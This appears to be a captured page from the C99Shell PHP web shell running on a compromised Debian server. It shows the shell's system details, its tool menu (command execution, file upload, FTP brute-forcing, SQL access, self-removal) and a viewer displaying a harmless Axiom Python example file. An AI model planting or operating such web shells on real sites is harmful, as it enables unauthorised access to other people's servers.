!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/python-axiom/examples/   drwxr-xr-x
Free 129.99 GB of 142.11 GB (91.47%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     bucket.py (1.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
from axiom import item, attributes

class Bucket(item.Item):
    typeName = 'bucket'
    schemaVersion = 1

    name = attributes.text()

    def getstuff(self):
        for food in self.store.query(FoodItem,
                                     FoodItem.bucket == self,
                                     sort=FoodItem.deliciousness.descending):
            food.extra.what()


class FoodItem(item.Item):
    typeName = 'food'
    schemaVersion = 1

    bucket = attributes.reference()
    extra = attributes.reference()
    deliciousness = attributes.integer(indexed=True)

class Chicken(item.Item):
    typeName = 'chicken'
    schemaVersion = 1

    epistemologicalBasisForCrossingTheRoad = attributes.text()
    def what(self):
        print 'chicken!'

class Biscuit(item.Item):
    typeName = 'biscuit'
    schemaVersion = 1

    fluffiness = attributes.integer()
    def what(self):
        print 'biscuits!'


from axiom.store import Store

s = Store()

u = Bucket(name=u'whatever', store=s)
c = Chicken(epistemologicalBasisForCrossingTheRoad=u'extropian', store=s)
b = Biscuit(fluffiness=100, store=s)

FoodItem(store=s, deliciousness=3, extra=c, bucket=u)
FoodItem(store=s, deliciousness=4, extra=b, bucket=u)

u.getstuff()

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0097 ]--